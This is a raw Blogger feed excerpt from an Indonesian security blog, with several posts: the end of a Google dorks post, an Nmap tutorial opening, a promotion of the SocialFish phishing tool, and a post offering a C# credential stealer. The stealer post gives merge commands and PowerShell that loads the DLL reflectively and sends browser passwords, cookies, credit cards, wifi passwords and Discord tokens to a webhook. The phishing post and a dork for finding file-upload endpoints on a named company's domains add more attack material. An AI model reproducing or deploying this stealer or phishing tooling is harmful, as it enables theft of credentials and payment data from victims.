src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHJm2jg_C-tX1d3TFrEKDH-2tt5Hsho2X5NWGEUdWBD87WrPjN9rraw_8KWZutSS3r6tiqNUyLyGEH7jEPggNCV8WrCwN9CuDIpWtejt1q3cSw_iDjnJPXPtlqvf-imEGytNYnfSzAUiHwO4vqNWpvYQPHqMesV9gJ-jZXEXkVbNRwqs_Okofu-SWt/w640-h176/4.webp&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;&lt;b&gt;&lt;br /&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Gabungkan dork Anda&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Gunakan “|” operator untuk menyertakan kedua kueri atau operator &quot;&amp;amp;&quot; untuk meminta kedua kueri. Berikut adalah contoh upaya mencari titik akhir pengunggahan file di beberapa domain:&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;(site:tesla.com | site:teslamotors.com) &amp;amp; ”choose file”&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;/b&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;b&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMduS-tXXmsnULX6eITzrDJeW-8vvtsm8GjxfduhcwKV2h37F99iwkcPL2CXgWrumciP0VrbknqdyuYheLqcFU6hF14r07-TJYweJ9_a7i7hxjg3N5tZL9kTYFJQry040NsQf03TN4qLz9wLLUrDZGDr9hKTda3Q-8ZaNpH7AbKoUJZV8DyJQito4r/s720/5.webp&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;212&quot; data-original-width=&quot;720&quot; height=&quot;188&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMduS-tXXmsnULX6eITzrDJeW-8vvtsm8GjxfduhcwKV2h37F99iwkcPL2CXgWrumciP0VrbknqdyuYheLqcFU6hF14r07-TJYweJ9_a7i7hxjg3N5tZL9kTYFJQry040NsQf03TN4qLz9wLLUrDZGDr9hKTda3Q-8ZaNpH7AbKoUJZV8DyJQito4r/w640-h188/5.webp&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;&lt;b&gt;&lt;br /&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Bonus Dork: Mesin pencari alternatif&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMr3nsOmCo1F4MVfuYrP6qcd0Tz1eYClDyTY73i9p6jx1NkZuQcxgnfmmgD8ygBrYpLW4WKxdiH-LHy1Qw5lZ5kaP4b9OckohMBMsvt1FbAr2JdzzupmF5XVDoQnRyhhyUApW4GwhC5j14FPVfDO1yowG0h_bMFEJCH76dkYQSBwZ0T407KCrWfDol/s720/b.webp&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;288&quot; data-original-width=&quot;720&quot; height=&quot;256&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMr3nsOmCo1F4MVfuYrP6qcd0Tz1eYClDyTY73i9p6jx1NkZuQcxgnfmmgD8ygBrYpLW4WKxdiH-LHy1Qw5lZ5kaP4b9OckohMBMsvt1FbAr2JdzzupmF5XVDoQnRyhhyUApW4GwhC5j14FPVfDO1yowG0h_bMFEJCH76dkYQSBwZ0T407KCrWfDol/w640-h256/b.webp&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Coba mesin pencari lain seperti DuckDuckGo, Bing, Baidu, dan Dogpile untuk memperluas temuan Anda.&lt;/p&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/3077569690190483627'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/3077569690190483627'/><link rel='alternate' type='text/html' href='https://xybernote.blogspot.com/2023/02/5-google-dorks-yang-harus-diketahui.html' title='Google Dorks Yang Harus Diketahui '/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjo_W0ePuHBSrXieAPxsK4O6fKTwk24S2xLbYl-awVNTMrJKLPrBvIAj5EkVZD63gRgJQhAFwX5gfi5wLeJ0ORlX9QHCl5R9nVMZs26_Gqlfwq-L8t60Cq8W9G42uzlhqDj1x1S-W9E1RpDaDRyaZhbXQ9u0-l_vcH2mwQqgjiGoPHZQqvzp3IEvI15/s72-w640-h396-c/823052020.png" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1191330060666792521.post-8015313780535175832</id><published>2023-02-18T10:47:00.004-08:00</published><updated>2023-04-05T07:38:33.169-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="C#"/><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Attack"/><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Password"/><category scheme="http://www.blogger.com/atom/ns#" term="xyber"/><title type='text'>Pengambil kata sandi [C#]</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAvGeqtco0Qp7eFs_WbK4u4UzoSclLK4KoXNcAZVq4VuIwmRLUvhQVd0jxGBAV88jW1o5OBctoO3XikgOMyKZe2epwUvVcUOz0HREmNHF5VB-CmmJd0YlcjFvrdw4PQLT93eBy6_njwpf8nXt2HxArIr659sv5f0lbIOuvO4TKyBIOx27KA88XtTWE/s1000/36kmPNfW7N994RjTki9P8Z-1200-80.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;562&quot; data-original-width=&quot;1000&quot; height=&quot;360&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAvGeqtco0Qp7eFs_WbK4u4UzoSclLK4KoXNcAZVq4VuIwmRLUvhQVd0jxGBAV88jW1o5OBctoO3XikgOMyKZe2epwUvVcUOz0HREmNHF5VB-CmmJd0YlcjFvrdw4PQLT93eBy6_njwpf8nXt2HxArIr659sv5f0lbIOuvO4TKyBIOx27KA88XtTWE/w640-h360/36kmPNfW7N994RjTki9P8Z-1200-80.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Sumber&amp;nbsp;&lt;b&gt;&lt;a href=&quot;https://github.com/xyber196/Password-grabber-in-C&quot;&gt;Github&lt;/a&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;browser-mal&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Ini dibuat untuk digunakan dengan bash bunny untuk bereksperimen dengan muatan. Tolong jangan gunakan untuk kegiatan ilegal.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;Menggabungkan Dll&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;pre class=&quot;notranslate&quot; style=&quot;border-radius: 6px; box-sizing: border-box; font-family: ui-monospace, SFMono-Regular, &amp;quot;SF Mono&amp;quot;, Menlo, Consolas, &amp;quot;Liberation Mono&amp;quot;, monospace; font-size: 13.6px; line-height: 1.45; margin-bottom: 16px; margin-top: 0px; overflow-wrap: normal; overflow: auto; padding: 16px;&quot;&gt;&lt;code style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border-radius: 6px; border: 0px; box-sizing: border-box; display: inline; font-family: ui-monospace, SFMono-Regular, &amp;quot;SF Mono&amp;quot;, Menlo, Consolas, &amp;quot;Liberation Mono&amp;quot;, monospace; line-height: inherit; margin: 0px; overflow-wrap: normal; overflow: visible; padding: 0px; word-break: normal;&quot;&gt;ILMerge.exe /out:browser.mal.dll BrowserMal.dll BouncyCastle.Crypto.dll Newtonsoft.Json.dll &lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;Penggunaan&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;C#&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;pre style=&quot;border-radius: 6px; box-sizing: border-box; font-family: ui-monospace, SFMono-Regular, &amp;quot;SF Mono&amp;quot;, Menlo, Consolas, &amp;quot;Liberation Mono&amp;quot;, monospace; font-size: 13.6px; line-height: 1.45; margin-bottom: 0px; margin-top: 0px; overflow-wrap: normal; overflow: auto; padding: 16px; word-break: normal;&quot;&gt;&lt;span class=&quot;pl-smi&quot; style=&quot;box-sizing: border-box;&quot;&gt;BrowserMal&lt;/span&gt;.&lt;span class=&quot;pl-smi&quot; style=&quot;box-sizing: border-box;&quot;&gt;Class1&lt;/span&gt;.&lt;span class=&quot;pl-en&quot; style=&quot;box-sizing: border-box;&quot;&gt;StartCreds&lt;/span&gt;(&lt;span class=&quot;pl-k&quot; style=&quot;box-sizing: border-box;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;pl-smi&quot; style=&quot;box-sizing: border-box;&quot;&gt;webhook&lt;/span&gt;&lt;span class=&quot;pl-k&quot; style=&quot;box-sizing: border-box;&quot;&gt;&amp;gt;&lt;/span&gt;, &lt;span class=&quot;pl-en&quot; style=&quot;box-sizing: border-box;&quot;&gt;extractWifi&lt;/span&gt;: &lt;span class=&quot;pl-c1&quot; style=&quot;box-sizing: border-box;&quot;&gt;true&lt;/span&gt;);&lt;/pre&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Powershell&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;pre style=&quot;border-radius: 6px; box-sizing: border-box; font-family: ui-monospace, SFMono-Regular, &amp;quot;SF Mono&amp;quot;, Menlo, Consolas, &amp;quot;Liberation Mono&amp;quot;, monospace; font-size: 13.6px; line-height: 1.45; margin-bottom: 0px; margin-top: 0px; overflow-wrap: normal; overflow: auto; padding: 16px; word-break: normal;&quot;&gt;&lt;span class=&quot;pl-smi&quot; style=&quot;box-sizing: border-box;&quot;&gt;$bytes&lt;/span&gt; &lt;span class=&quot;pl-k&quot; style=&quot;box-sizing: border-box;&quot;&gt;=&lt;/span&gt; [&lt;span class=&quot;pl-k&quot; style=&quot;box-sizing: border-box;&quot;&gt;System.IO.File&lt;/span&gt;]::ReadAllBytes(&lt;span class=&quot;pl-s&quot; style=&quot;box-sizing: border-box;&quot;&gt;&lt;span class=&quot;pl-pds&quot; style=&quot;box-sizing: border-box;&quot;&gt;&quot;&lt;/span&gt;PATH TO DLL&lt;span class=&quot;pl-pds&quot; style=&quot;box-sizing: border-box;&quot;&gt;&quot;&lt;/span&gt;&lt;/span&gt;)
&lt;span class=&quot;pl-smi&quot; style=&quot;box-sizing: border-box;&quot;&gt;$assembly&lt;/span&gt; &lt;span class=&quot;pl-k&quot; style=&quot;box-sizing: border-box;&quot;&gt;=&lt;/span&gt; [&lt;span class=&quot;pl-k&quot; style=&quot;box-sizing: border-box;&quot;&gt;System.Reflection.Assembly&lt;/span&gt;]::Load(&lt;span class=&quot;pl-smi&quot; style=&quot;box-sizing: border-box;&quot;&gt;$bytes&lt;/span&gt;)

&lt;span class=&quot;pl-smi&quot; style=&quot;box-sizing: border-box;&quot;&gt;$entryPointMethod&lt;/span&gt; &lt;span class=&quot;pl-k&quot; style=&quot;box-sizing: border-box;&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;pl-smi&quot; style=&quot;box-sizing: border-box;&quot;&gt;$assembly&lt;span class=&quot;pl-smi&quot; style=&quot;box-sizing: border-box;&quot;&gt;.GetTypes&lt;/span&gt;&lt;/span&gt;().&lt;span class=&quot;pl-k&quot; style=&quot;box-sizing: border-box;&quot;&gt;Where&lt;/span&gt;({ &lt;span class=&quot;pl-c1&quot; style=&quot;box-sizing: border-box;&quot;&gt;$_&lt;span class=&quot;pl-smi&quot; style=&quot;box-sizing: border-box;&quot;&gt;.Name&lt;/span&gt;&lt;/span&gt; &lt;span class=&quot;pl-k&quot; style=&quot;box-sizing: border-box;&quot;&gt;-eq&lt;/span&gt; &lt;span class=&quot;pl-s&quot; style=&quot;box-sizing: border-box;&quot;&gt;&lt;span class=&quot;pl-pds&quot; style=&quot;box-sizing: border-box;&quot;&gt;&#39;&lt;/span&gt;Class1&lt;span class=&quot;pl-pds&quot; style=&quot;box-sizing: border-box;&quot;&gt;&#39;&lt;/span&gt;&lt;/span&gt; }&lt;span class=&quot;pl-k&quot; style=&quot;box-sizing: border-box;&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;pl-s&quot; style=&quot;box-sizing: border-box;&quot;&gt;&lt;span class=&quot;pl-pds&quot; style=&quot;box-sizing: border-box;&quot;&gt;&#39;&lt;/span&gt;First&lt;span class=&quot;pl-pds&quot; style=&quot;box-sizing: border-box;&quot;&gt;&#39;&lt;/span&gt;&lt;/span&gt;).GetMethod(&lt;span class=&quot;pl-s&quot; style=&quot;box-sizing: border-box;&quot;&gt;&lt;span class=&quot;pl-pds&quot; style=&quot;box-sizing: border-box;&quot;&gt;&#39;&lt;/span&gt;StartCreds&lt;span class=&quot;pl-pds&quot; style=&quot;box-sizing: border-box;&quot;&gt;&#39;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pl-k&quot; style=&quot;box-sizing: border-box;&quot;&gt;,&lt;/span&gt; [&lt;span class=&quot;pl-k&quot; style=&quot;box-sizing: border-box;&quot;&gt;Reflection.BindingFlags&lt;/span&gt;] &lt;span class=&quot;pl-s&quot; style=&quot;box-sizing: border-box;&quot;&gt;&lt;span class=&quot;pl-pds&quot; style=&quot;box-sizing: border-box;&quot;&gt;&#39;&lt;/span&gt;Static, Public, NonPublic&lt;span class=&quot;pl-pds&quot; style=&quot;box-sizing: border-box;&quot;&gt;&#39;&lt;/span&gt;&lt;/span&gt;)

&lt;span class=&quot;pl-smi&quot; style=&quot;box-sizing: border-box;&quot;&gt;$entryPointMethod&lt;span class=&quot;pl-smi&quot; style=&quot;box-sizing: border-box;&quot;&gt;.Invoke&lt;/span&gt;&lt;/span&gt;(&lt;span class=&quot;pl-c1&quot; style=&quot;box-sizing: border-box;&quot;&gt;$null&lt;/span&gt;&lt;span class=&quot;pl-k&quot; style=&quot;box-sizing: border-box;&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;pl-k&quot; style=&quot;box-sizing: border-box;&quot;&gt;@&lt;/span&gt;(&lt;span class=&quot;pl-s&quot; style=&quot;box-sizing: border-box;&quot;&gt;&lt;span class=&quot;pl-pds&quot; style=&quot;box-sizing: border-box;&quot;&gt;&#39;&lt;/span&gt;WEBHOOK&lt;span class=&quot;pl-pds&quot; style=&quot;box-sizing: border-box;&quot;&gt;&#39;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;pl-k&quot; style=&quot;box-sizing: border-box;&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;pl-c1&quot; style=&quot;box-sizing: border-box;&quot;&gt;$true&lt;/span&gt;))&lt;/pre&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;Kegunaan&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;Mengekstrak kata sandi, cookie, kartu kredit, dan alamat dari browser berbasis tokek dan kromium.&lt;/li&gt;&lt;li&gt;Ekstrak kata sandi wifi yang disimpan.&lt;/li&gt;&lt;li&gt;Ekstrak discortd token.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/8015313780535175832'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/8015313780535175832'/><link rel='alternate' type='text/html' href='https://xybernote.blogspot.com/2023/02/pengambil-kata-sandi-c.html' title='Pengambil kata sandi [C#]'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAvGeqtco0Qp7eFs_WbK4u4UzoSclLK4KoXNcAZVq4VuIwmRLUvhQVd0jxGBAV88jW1o5OBctoO3XikgOMyKZe2epwUvVcUOz0HREmNHF5VB-CmmJd0YlcjFvrdw4PQLT93eBy6_njwpf8nXt2HxArIr659sv5f0lbIOuvO4TKyBIOx27KA88XtTWE/s72-w640-h360-c/36kmPNfW7N994RjTki9P8Z-1200-80.jpg" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1191330060666792521.post-3599373725831785166</id><published>2023-02-08T10:03:00.004-08:00</published><updated>2023-04-05T07:38:18.301-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Attack"/><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Phishing"/><category scheme="http://www.blogger.com/atom/ns#" term="Python"/><category scheme="http://www.blogger.com/atom/ns#" term="xyber"/><title type='text'>Phishing Tool dengan SocialFish</title><content type='html'>&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1rwEWcO_gQ0F0I_YAARcx3uIDYfCzUGKRb0QkD3aFsLFGkabofOjmREiLgVUMaPaDA0EYDQocJTNckVX6h9mnbGRBDxQUzN7IEXLPuFximwjTfyp4Ub-f_s65XYKVgu6jY1vbsmykvz6fW6T53crql_4c6j0FAaomyxGKT9RONc3LytCTAA0zXQD5/s2876/screen.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1370&quot; data-original-width=&quot;2876&quot; height=&quot;304&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1rwEWcO_gQ0F0I_YAARcx3uIDYfCzUGKRb0QkD3aFsLFGkabofOjmREiLgVUMaPaDA0EYDQocJTNckVX6h9mnbGRBDxQUzN7IEXLPuFximwjTfyp4Ub-f_s65XYKVgu6jY1vbsmykvz6fW6T53crql_4c6j0FAaomyxGKT9RONc3LytCTAA0zXQD5/w640-h304/screen.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;Sumber &lt;b&gt;&lt;a href=&quot;https://github.com/xyber196/PhishingSocialFish&quot;&gt;Github&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;DIGUNAKAN HANYA UNTUK TUJUAN PENDIDIKAN.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;Penggunaan SocialFish adalah TANGGUNG JAWAB PENUH dari PENGGUNA AKHIR. Pengembang TIDAK bertanggung jawab atas penyalahgunaan atau kerusakan yang disebabkan oleh program ini.&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p style=&quot;text-align: justify;&quot;&gt;&quot;DITANGGAPI. DALAM HAL APAPUN PEMEGANG HAK CIPTA ATAU KONTRIBUTOR TIDAK BERTANGGUNG JAWAB ATAS KERUSAKAN LANGSUNG, TIDAK LANGSUNG, INSIDENTAL, KHUSUS, CONTOH, ATAU KONSEKUENSIAL (TERMASUK, NAMUN TIDAK TERBATAS PADA, PENGADAAN BARANG ATAU LAYANAN PENGGANTI; HILANGNYA PENGGUNAAN, DATA, ATAU KEUNTUNGAN; ATAU GANGGUAN BISNIS) NAMUN PENYEBABNYA DAN BERDASARKAN TEORI TANGGUNG JAWAB APA PUN, BAIK DALAM KONTRAK, KEWAJIBAN KERAS, ATAU KERUGIAN (TERMASUK KELALAIAN ATAU LAINNYA) YANG TIMBUL DALAM CARA APAPUN DARI PENGGUNAAN PERANGKAT LUNAK INI, BAHKAN JIKA DIBERITAHU TENTANG KEMUNGKINAN KERUSAKAN TERSEBUT.&quot; Diambil dari &lt;a href=&quot;https://github.com/xyber196/PhishingSocialFish/blob/master/LICENSE&quot;&gt;LISENSI.&lt;/a&gt;&lt;/p&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/3599373725831785166'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/3599373725831785166'/><link rel='alternate' type='text/html' href='https://xybernote.blogspot.com/2023/03/phishing-tool-dengan-socialfish.html' title='Phishing Tool dengan SocialFish'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1rwEWcO_gQ0F0I_YAARcx3uIDYfCzUGKRb0QkD3aFsLFGkabofOjmREiLgVUMaPaDA0EYDQocJTNckVX6h9mnbGRBDxQUzN7IEXLPuFximwjTfyp4Ub-f_s65XYKVgu6jY1vbsmykvz6fW6T53crql_4c6j0FAaomyxGKT9RONc3LytCTAA0zXQD5/s72-w640-h304-c/screen.png" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1191330060666792521.post-5979009599999956398</id><published>2023-01-30T08:24:00.009-08:00</published><updated>2023-04-05T07:37:59.100-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Security"/><category scheme="http://www.blogger.com/atom/ns#" term="nmap"/><category scheme="http://www.blogger.com/atom/ns#" term="xyber"/><title type='text'>Nmap untuk Ethical Hacker</title><content type='html'>&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqqzKi0BqEuggjfwGDN3vZIVigE-VE-Jjb0KGoEy0TNrbUVugfyaUCKcChEE_lXAEOqMkAJ4wt157syKJ2KZ0ek9jra0KDNYzihTyAwcbYJo1_YZH8bKd4HjX_9KH7e-AEMF29Ui8JxU0hATW1nM0EzrhONywzQ-aHL51EuXYFAlK_ayWVxk6yy7RK/s960/nmap-project-logo-960-540.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;540&quot; data-original-width=&quot;960&quot; height=&quot;360&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqqzKi0BqEuggjfwGDN3vZIVigE-VE-Jjb0KGoEy0TNrbUVugfyaUCKcChEE_lXAEOqMkAJ4wt157syKJ2KZ0ek9jra0KDNYzihTyAwcbYJo1_YZH8bKd4HjX_9KH7e-AEMF29Ui8JxU0hATW1nM0EzrhONywzQ-aHL51EuXYFAlK_ayWVxk6yy7RK/w640-h360/nmap-project-logo-960-540.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;Nmap untuk Ethical Hackers. Di sini Anda akan mengetahui tentang &lt;a href=&quot;https://xybernote.blogspot.com/2022/12/mengenal-nmap.html&quot;&gt;nmap dari dasar&lt;/a&gt; hingga lanjutan. Dalam tulisan ini. Ditulisan ini kita akan membahas:&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;TCP, UDP, FIN, TCP SYN, Idle, Pindai Ping&lt;/li&gt;&lt;li&gt;Deteksi Versi&lt;/li&gt;&lt;li&gt;Pindai port tertentu&lt;/li&gt;&lt;li&gt;Pindai host dan alamat IP&lt;/li&gt;&lt;li&gt;Deteksi CVE&lt;/li&gt;&lt;li&gt;Spoofing Alamat Mac&lt;/li&gt;&lt;li&gt;Meluncurkan DDOS dengan nmap&lt;/li&gt;&lt;li&gt;Meluncurkan serangan bruteforce&lt;/li&gt;&lt;li&gt;Pindai + deteksi layanan OS&lt;/li&gt;&lt;li&gt;Pemindaian idle zombie&lt;/li&gt;&lt;li&gt;Mendeteksi infeksi malware&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Dan parameter serta teknik pemindaian &amp;amp; metodologi yang jauh lebih penting.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Pemindaian UDP (-sU)&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Teknik ini digunakan untuk memindai port UDP yang terbuka dari IP/host target. Di sini, pemindaian UDP mengirimkan Paket UDP ke setiap port target dan menunggu hingga mendapat respons. Jika, ia menerima pesan kesalahan yang menyatakan bahwa ICMP tidak dapat dijangkau, ini berarti port tersebut ditutup. Namun, jika mendapat respons yang dapat didekati, berarti port tersebut terbuka.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;Command: nmap -sU &amp;lt;target&amp;gt;&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;font-size: large;&quot;&gt;Pindai FIN (-sF)&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Dalam teknik Fin Scan, paket dikirim dengan Fin Flag. Terkadang, karena firewall, Paket SYN mungkin diblokir. Dalam kasus seperti itu, FIN Scan bekerja dengan melewati firewall. Paket FIN dikirim ke port tertutup, jika tidak ada tanggapan yang diterima, itu karena paket dijatuhkan oleh firewall atau port terbuka.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;Command: nmap -sF &amp;lt;target&amp;gt;&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;Pindai Ping (-sP)&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;Teknik ini hanya digunakan untuk mengetahui apakah host tersedia atau tidak. Ping Scan tidak digunakan untuk mendeteksi port 